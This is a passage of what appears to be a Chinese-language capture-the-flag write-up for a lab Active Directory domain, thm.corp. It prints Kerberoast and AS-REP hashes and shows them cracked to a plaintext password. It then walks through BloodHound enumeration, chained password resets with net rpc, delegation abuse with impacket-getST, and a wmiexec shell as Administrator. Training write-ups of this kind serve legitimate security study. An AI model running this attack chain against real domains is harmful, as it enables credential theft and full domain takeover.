597ba2882cf5c88f130e01bae60dbaa44b58c5c0d9ff4daa9865f9b82b8b2201ca6ea48537
$krb5tgs$23$*CYRUS_WHITEHEAD$THM.CORP$thm.corp/CYRUS_WHITEHEAD*$af08739d9456942c053fd19e04fcd5db$e54b6d9a4255952c2e9b10493f03690150195ac10375cbe482dc77d820277788fc13efe387aacefaa8017ee0709496c9fad4b992a7aeedb7d22bfed97256792117c56fa1f922c7eda6c3868058aa3c870a4052df16f039ffbbdd993a4ae08bf2d64588d7a81317d4f8a6d9e8ed8b5a177c5e21d3840bebdb1bf8c309819af663f4bd717fa6af6c947fc34326c2ece09349d27bcd2b296acd13d9045b046327871d01b8d979773f511c8b9f3a254e42c01b0c78dc341db3e32d566fe658b851b1d5b31de6b5501f73faad0e8b8bbdd4251974dca30dea0fd5ae5a08e12bf7d6a7ccfa5a8f02bb5bea7cc01e9300f8ae351e0d91416136a46c6bcf7b3466547cc05b10654183c8cb8abec73bcac8c316cebe44216cf78317de600af92e7f37bbaa2997dc03ba10ce97bb98d3f5cb9c529e918c656d7c2471d12a3ca6f424fb897f17e5a2a08477b0a175cfdc73081b730669e0a6456932c00b8a32259047f17fffd55f6644fb81489be0ba9e8750f84d49e4846a7a5a242327b05d98eb734ebb9aee26a94f69337cd56184412289840e2dedf5900cea2f317bbc5a8543a97a603cd6ff7328d58f5a90451cf7d400058f15aaa4e1ee3b2164ad98d3517be156440bcafebd6cf987ce62dea04dc1e6562b48a30682cf6bf7cfe11f6751e240533a19ed14f5db79de4a265f60f8d145ca2ca6b649970b6c544313004a24a13e11d5f271061fb00a26df14158e4465dd1652dcc643ff6cbf1f64b3207022478e764edc3e5a141dff901d7ef7fdbb1c17db75d122130d499758a8d98ffead97bd3427e2e72f62f9c4c3c725e5673f7486b1c2d520654626a4fa7fc8ba6507f852074bcf7d427b0ff399beaa019e15d7da1af65f12b0a0032a80cd4cf8310cbf89bd22edf9bc322799d9653e65579c947c4b73d67f2fb4b282517611795128a7374597e2af7718db5aa90963d9d46f5258ece3f517accd9d7f8d3ceb1edfabfacaccafc36cf786b062ec7cd281273f37549f90b4d3a58bc91fb9dc84cf582dbff0e9215d06bbe467df9a3eb10fa3bdca869a780ba7656a51dacf1e739e9abeda2fda83973de44bf70e969955abd52b87ec923aa6b90d5e34a31e29798eb4654eb50da48563def405eb309d159e0cf75cac06285a2d2ed943580558dc7c496d30fc026b6c71b1df64bf3b30bb77b4cd3df2986d23410105304b55b4c075f706875ab318cbc1d8f52bf03561d830b38f4e4529be00e9751325cf0f1d16b46aa2011f7d28200cb8d58ab084a0a5b3ec87ac0542c079a817c19a4c4d0baa2f3998d51330b0966fe46c6b86e12bbd10adcce7637f5b759ea46d8a3acb4b9a6a280f56403895c4f0d9c505924b31672f16cfaea6a3b29f806ccad0d80128b781a262ca10b01783ce5ccb9cd03a7ad8974f1462ab9071bbd399b1662a2183fbf86f0edcd7823a41fe
$krb5tgs$23$*TRACY_CARVER$THM.CORP$thm.corp/TRACY_CARVER*$2895f07c10bdb3e51492857baa4139ae$012941ea5ffaa6eecd439a430d098d9d44b5460c98c0c2b6b817afd72a0a743657fd19286dc97724759dd015cfecc253182de4ff5030d142a61f0c3b7a0a0d06588f69f24e8f9f20839995aae53cd74cf1fad91fb1b7f0874504c6442bb67a2e6e5caa3a3115d34233b4ab242347d40a538433740fe7affed89dda203294d7eef150206dac15dbd4b434896fa376417e253b273694d3fa34ef163a3f63a34dc2dd3d36701669fa28fff3c1517eb58c0df5f1a56717c341eabd8ffadc64b3771f1762ded482f393dc9397ff959f5b3e5caf224eb3cd79a2da39faac41e4ff3bbd6332282ff440ad8dced9ac6d1479acfd48871456fa455248ad58cbfb2a5cfe207d5443634a3430fb21e25154e0ee93ef22ea9b7d2fc10455e2425649b5cb277d0ed552116c459f45c4cfe726bf2e78fcdacea3423755bc42ab60f1bf3a9ad7f44aec6e88f2072ad1c750a754391a1b2c264687265fdd7a36671e8f3efc6aa0656a984d650246ea6bc91c822dfcc2982376090c21f45201e80454dbd02c0246e71a6ceea593954e3052e6dbd3a7249ab6591207bc60009bae3ac2ac59399dca943956c003cf2e0a952cbaa96e2d260e3df708b03168ab0f07014af89c1f3c81708eb99aa67c04be1b5c6dc59c2feff5fc13083f472e0daadcf6c20755bdd08b534db0fcd0923a32fc32ba6801d5ed41460d5902f5babf487a989b83299e3989cc02d8e2f85b8acf60572a20bd1d23228522f23bc102c565716dd60312adfe35bf2c656433ba0a190c5d3d043bc3403f31a6aa8dc04115c2aab8a7ef64c3ae9e73f302ccd7ceec85f60661550a3e8f5fcfdf8d5f4b3487bf85cd573903f2296841724095512131cb872f665b2b05d3ac4ac0bba6e2251545e693cf6a8e3ede96c9e0e1851fdfac133b08eccd0c22b7339ee2764e785bd683cbefc6893cff730566a887daeb3db182cbb5ab0a3a1b8debaaad3ca1eb9f64056bbb57c2a2858fe0a6e84dd2ee104790a4a147eaa511efd330630e8510b646986ce3130de434f6bf837dcedaf6394a8b9497fd52cbe04d9a3062fb47f241607d684fe0462cd1e2a6217fb0e22453703ed8d48ce9cfe15a93d583912686140db0bb22b03b4475e7f953988bdef8523570ca46fe31121ee49628ef0565cf06209443852c7318e61b71df70c1e94b3a2d62a90be29a45a3a06588e3e7a0261f976d5b64fa0366e04025db7a60d1fb7b72b49c3c74bc05954b8b52d8deea95e00a49f41778b8edab80a9abb8f753ce71414d292b18c39975221a9f8b7fc9e0d23577ccc933c94d63e83b27e65c5c4c28f91d620c118698e58d07a3a202ce89a0437c042e227525c2703d87c40defacafd8c9b1ea572dcd754ec42d07df9369993f606db7b06c38e806edcaef1ac37ec695c074a503a33ac2e5dd35609f5317f04ec12de5f65237bcf807e656
$krb5tgs$23$*DEANNE_WASHINGTON$THM.CORP$thm.corp/DEANNE_WASHINGTON*$f3393471c9aecf05aa24c7b4a48a2567$9b59386ab838c74f5d02791491ed3b93ae5d67620767b1489be65a063869c9ec760a88ea48d8be56fcbbc5466d739b8afeb470a55770e6b58e917cb1bd235233b60f0ce0578d742c6dd44243c20fb2b81cc00b69154fdf6afbbcd98b7e323657fe39dd5c3f2e6e98b86096dac1a70836a50a903a57679e48e92daba4409fdc7e189c19bcb17b45ca0b753d3aa82910a060a946999f6f6b159408d2c7f84e99f6c59dabc3d141ea48b6e5a0df84ad88447161d4c4d3599165ea6e03cae8f938a428c93148b30a0406b4fd026672c7d798c49b1efa3af2071ba91e993046a43b5a2e2e2a59064f6b08954de504cf7f58735234f0f2368a80d60c7905dc4b867dd2e9fbebc9df4d19273acac8ce3310af520adcf52f58d10721e955de038aa88f9832a809778f6f17577e8763a5cae7b8daa2a66393c2b935c593ca1f5070d1f8d3575215676d9f14c587b8ad5773ae1517757dcfecba173f080c1c8dc695a464d383dcca35d9b8261d5311e1b2dfa74840c371050431c60bef90065e24f4b92064f5186e83dcb9f28243e376e86085643f329122b72795a3f713f321ccd37f24bd42b913c9f09b9acee83930b2bf57adff59e397fc4ea4d69251d50ef3cb1b4dc0a8262c2897166f2fc7d03b73a49343146008ff136397786f4f989ba5be1ef8fd345777aae508b121dce218c0cec579a34f669ab24e99127584eefc11daead027bf5f2a086135dfbacf6245c18091f5fb63e9fe9b292e55e2b0effbe102554f94cd5432f9fd63dbf3abe7ad52a574b9fba523c8138999b6624c241b56db2ab107e4deb76ab4fab4813a8cdd929a7cc0216d948314d1a59b2ce4ce2302e155085da9a568ab2a6ae5b2d3fcd0547042c7f2bb2d4c3508433cd5530e3d5212fe0482d54f4cc061976f1139b657f59ffa4b0c2e75f76b21c799126c4cc23a7c6e72bcf918a6a5eb8fc9b9b36b01ef61f52f18ae795b0cfbd5bb9601fa7afde633fac2427d5f45b425094b9c9863705476df9be000c769f5b4d8c334cce1cd86b040f1046c0149112a1b35431a98a047ff9b7febcb5b26f1cf71a156384f7d86a0743a9178ba64685b35dcb0ffbd043d724fb5a6d2d4d8a59af86268cbd64085ef53d8f0c5df2e730542b7379819033aee720f7a74aa48050566505fa1ca4a6d066398d2793058824ec0924b32d11fa8991b92220dcb4fc36547147f3ee93543a8f288e41137b0b71460eb36a13e18d2d7a9223fb52dd786df6de0f3888bf584b5abb569ddedf82ecefd1458cb7d50278f0192f882a98379d50daeed9dd45aa708994052731317499f62cc4b96228ca2d9b7d31c7d202fbf60c472ce9e5b708ec29a5d1c9f7cce9761253367f47b2c60c8e34dc96df48751543dcb88499c1cdac7cb5fd80470cc194169ad35244c1668889ded5d3e97c08181ce33a61f158efdfa8bcc55
$krb5tgs$23$*DARLA_WINTERS$THM.CORP$thm.corp/DARLA_WINTERS*$d56c3cded6b670ddcefe8615d3e4cfc6$826fe5690190bb515be0f5da97e68a6a2f2ff79c2e94fe2cef4edb2a29545fa07720bcef6b4b2c6018ac74d2eb59b4c6c428ba82146c2639da2044406b2d3305b789ed6fc0247d828fa2543c075777a474ca33d0724062e2f25b2f7b7bc1689ac264d4549d5c02229addbc381119e4d6534a03abbad1bd35c4892522c3c73a4c63d5249c4af0366e5372253d286a3b0781c359c481e318be1b8bda6e3204eb6ce213ccc78515c7d016caefb987b335ecbcd32cf26b696d6573dbb12b89b165663cee74d5ee5820822aa846c06eff96d5d539f222eb753c51ceade1e1ffefb3f62e3a9769e5a5fe6f528e4578462bd1cf4cae1325d1ab58bb39d505a9e614f2e691626b700aec68bf5fade7145f175f83d07ffc2b050335e70275acbad0c2a6f4ae6637b86aae9935dd2da2bc0f1ca7159fe4667af79a0d8e7dbcae0e93a4d15237d0b54de541ef92447b980ec3e113aa0b5e64399fc507b3a87e4bd9d23c2d367f9f096f031f4d1d840df23efc7cb08038c6ee4eefabaf07d232c15c5abcfcfd010c337ebf3ca253c327f973809e28ac413b7e0b6e02fd59973ac326538e06f5fc061f8575c9f136aa647046d588085de45f0f7b2055183c6aad1194804e230d0dbe6f4ace4e6da46cd7ee38528a8e691eaf6db4f96e82b4bb9dd697e8e1bdee9eb4c911d009b02cfc870a4e221eb0830c38d7adc116f69e67de4f2f1fd2b87943ad49b5b98a3bbb7fa1302187e7f27cac5ae2e64d9980799f18e68daaf5dca0260df16550c0359a877d13f76be1079acdcc31b0d0ba52d9d5ff10804e8a10eaa9df8700deeb95979b5fdae1b8ae8a50f3f6ef5ed4ae684b3730ab2788d289b6a8ab1965d80d670e557cded0b2c81fb2e142b949dbc440593ac6d7f90d817f2025171497979c96f3068017b6254a2e0733716611dfeb40e3f3678acdcd5a0273aaad6085c86d6d20418bc5d650f66f2b3de3bb06a41b6937771089b1cfffdbe47681a30b80952cf4ac4e7875c2d1ae88c021c040c2d4320786eb20159ff0c3662021f50729b21a71ee96e4b3e9bba7b7d69f42edc2726323d3b89427200e13be3e73cc2a5fe7e0cffffcf003fd96bac6e96ee1c5f087617a82e6eaf7ce9dc8acf3b570a7c0d28471458e63511d861254ff2baedd618dc43fdff3acbc130335210ce5797fe943e98c80025803816dd65a407ea41fe3f416d3f2bd54331a888760b9a7304f236beb3f79abae1f7679a593e438fa2039f4db1883997523c59c5140264100d178c13b5e95597cbc239d1af8bf642b74beb628eef3fd4560f86126e085b455d791b8044572975b3dadda60a63935fc79c76f95f4c8fde1a5de7628a38a508e1564abd0ea270f7012417817253d07f759ab680458643ac7c8422154400edf085e73c7be36dbda47fc9b7f7879a818078d14a0b25cea68734964fae88ddd
使用 impacket 完成 AS-REP Roasting 攻击

AS-REP Roastable users (DontReqPreAuth)的用户有:ERNESTO_SILVA、LEANN_LONG、TABATHA_BRITT

尝试拿 AS-REP Roastable users 的 hash

impacket-GetNPUsers thm.corp/ -usersfile user.txt -no-pass

[email protected]:895dcf956ea4225d2bf897b4cc547a0c$22042a63f190c44f16a8f099894a8f804664379c1bbc2eafe5f17592a634f5033559692f5157fa6cb379f3c32040e80a8e503f72e63eb346479097ec8ccb84e13015873ae91db956db72b08c3163cfe040b156aea531829b310138a4f7242935abb015914321a124471cfac1a4acd39f96d9b96de94222ea09a0198306ae76aada00599c5943f6eff80ea0660084a7aeb8c257ee12c448bfdddcce53098cd4de375c3e7002a866833b66961690bc8a30ca5660bc68e07f320dec46dbbe42ab442a1ff8f25bd03efb2b4e6188e4cc931057712d574f2f3a819bc56cd93a7c307fcfc874bb
[email protected]:fbe5b46e305da18ec25b18a33d6197cc$f55110539e59a0469b0d41b8de7835bab6068d0ba4752179b57ee1492c9fd317f30c829e8bd9bb76473d2ef7602c033bd5982b767c18832b7536e8313accd4d094d8da51f1e286a90d5a197f8117a25a2492a35436ee9ab876f8024a67a7c76ec8ace0b8bad03157fa62dd9011cfbf8909ba213e0affc3f6c51bb733d1f7eb29a448dc5a850679005c94437ced98a5a7cdfc6c4850510701ecbf32ab033a64183712e386d98d829fff3c9c1be4c756a6f37972736097dab7ea681431d8519261fd9a6d3faedf667fc3b04d394772e4f875024f1ac3725133d0194efd1ff6487a8995cd8f
[email protected]:99cb9b15f098265867fff95249664517$9d05e6d3c5d0197c2d7da2a088bb3bc79eed40e0b5b2f9662d083d8a42d16583c72ffa20a1a5edaec697ffd6b35973f3246cdd40867909c00e72401e48f7a9d020aee9e37c309fb159bf4bd1b575515cd8b7df277feb1635d488d25b5e1dee31e40842343b8e235b71f3baffab68159965b9adf413b407fe8e27eedc88bcfea7f8b7d28d976eb73e0f06a58fe31a62ad97df06b4266cbe8715189aabd5fefda1b51ab2e0dc51a7248631a6b623d93d44787cf47c2982ecb9fddd55ca932b6e8ff9d68159b2ca7e2301f498b232137a97cd1944d79e49d26b5627498d5859c06903e08ebf
爆破 HASH

将两份 hash 分别写入 hash_k.txt 和 hash_a.txt,用 john 爆一下,为什么要分开呢,因为加密方式不一致,一起解要报错

john hash_k.txt --wordlist=/usr/share/wordlists/Active-Directory-Wordlists/Pass.txt
john hash_a.txt --wordlist=/usr/share/wordlists/Active-Directory-Wordlists/Pass.txt

# 没跑出来,换系统默认字典
john hash_k.txt --wordlist=/usr/share/wordlists/rockyou.txt
john hash_a.txt --wordlist=/usr/share/wordlists/rockyou.txt

最终只有一个用户的密码被爆破出来了

marlboro(1985)   ([email protected]) 

利用 TABATHA_BRITT 凭证跑 bloodhound

bloodhound-python -c All -u 'TABATHA_BRITT' -p 'marlboro(1985)' -d thm.corp -ns $TARGET --zip

清空之前的数据后再导入,防止干扰,然后查找当前用户到域管的路线

可以看到一条路线:TABATHA_BRITT 完全控制 SHAWNA_BRAY(重置密码) → 重置 CRUZ_HALL 密码 → 控制 DARLA_WINTERS(重置密码) → 通过委派攻击 HAYSTACK → 通过 GenericAll 控制 TEST OU → 控制 DA 成员 HORACE_BOYLE → 获得 Domain Admin。

横向移动至域管

利用寻血猎犬给我们的命令

  1. 利用 TABATHA_BRITT 重置 SHAWNA_BRAY 的密码

    net rpc password "SHAWNA_BRAY" "newP@ssword2022" -U 'TABATHA_BRITT'%'marlboro(1985)' -I $TARGET -S "thm.corp"
    
  2. 利用 SHAWNA_BRAY 重置 CRUZ_HALL 的密码

    net rpc password "CRUZ_HALL" "newP@ssword2022" -U 'SHAWNA_BRAY'%'newP@ssword2022' -I $TARGET -S "thm.corp"
    
  3. 利用 CRUZ_HALL 重置 DARLA_WINTERS 的密码

    net rpc password "DARLA_WINTERS" "newP@ssword2022" -U 'CRUZ_HALL'%'newP@ssword2022' -I $TARGET -S "thm.corp"
    
  4. 委派攻击拿凭证

    # 默认命令
    getST.py -spn 'HTTP/PRIMARY.testlab.local' -impersonate 'admin' -altservice 'cifs' -hashes :2b576acbe6bcfda7294d6bd18041b8fe 'domain/victim'
    # 改造一下
    impacket-getST -spn "cifs/haystack.thm.corp" -impersonate "Administrator" "thm.corp/DARLA_WINTERS:newP@ssword2022"
    
  5. 利用凭证

    # 设置环境变量
    export KRB5CCNAME=Administrator@[email protected]
    # 获取shell
    impacket-wmiexec THM.CORP/[email protected] -k -no-pass
    

拿 root.txt

总结

  1. 域渗透知识点太多了,建议打的时候看看思维导图,没思路的时候多尝试
  2. 字典不要太局限,这次 Active-Directory-Wordlists/Pass.txt 没跑出来,但是系统自带的 rockyou.txt 确跑出来了
  3. NTLM 强制认证攻击在打靶过程中局限性较大,需要有可写目录,并且用户会点击(或脚本会定时访问才能触发),但在是战士可以作为一个类似钓鱼的手段,投放 lnk 来吸引用户主动点击